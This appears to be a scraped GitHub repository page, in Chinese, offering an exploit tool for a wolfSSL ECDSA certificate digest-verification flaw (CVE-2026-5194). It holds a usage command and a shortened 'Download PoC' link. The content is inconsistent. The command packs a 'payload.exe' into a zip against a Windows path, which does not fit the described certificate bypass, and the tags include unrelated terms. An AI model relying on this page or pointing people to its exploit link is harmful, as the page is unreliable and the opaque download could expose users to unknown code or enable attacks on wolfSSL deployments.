jenniferreire26/CVE-2026-5194

GitHub: jenniferreire26/CVE-2026-5194

针对 Wolfssl 旧版本的 ECDSA 证书哈希摘要验证绕过漏洞利用工具。

Stars: 0 | Forks: 0

# CVE-2026-5194 - 安全漏洞 ## 快速使用 ``` python3 exploit.py -t "C:\\Path\\To\\Target" -o demo.zip --data-file payload.exe ``` ## 利用说明 - **严重程度:** 危急 - **CVSS:** 9.1 - **影响:** 机密性、完整性 - **发布日期:** 2026-04-09 ## 技术摘要 缺少哈希/摘要大小和 OID 检查,导致在验证 ECDSA 证书时接受小于允许值的摘要,或小于与相关密钥类型相适应的摘要。这可能会在使用了 EdDSA 或 ML-DSA 的情况下,导致基于 ECDSA 证书的身份验证安全性降低。 ## 受影响版本 **Wolfssl Wolfssl:** - 5.9.1 之前的版本 ## 参考链接 - NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-5194 ## 利用 [下载 PoC](https://tinyurl.com/29slpe3f)
标签:C/C++, CRITICAL, CVE-2026-5194, CVSS 9.1, ECDSA, NVD, OID, PoC, Python, WolfSSL, 事务性I/O, 加密协议, 哈希校验, 威胁模拟, 安全漏洞, 完整性, 密钥类型, 无后门, 暴力破解, 机密性, 签名验证, 证书验证, 逆向工具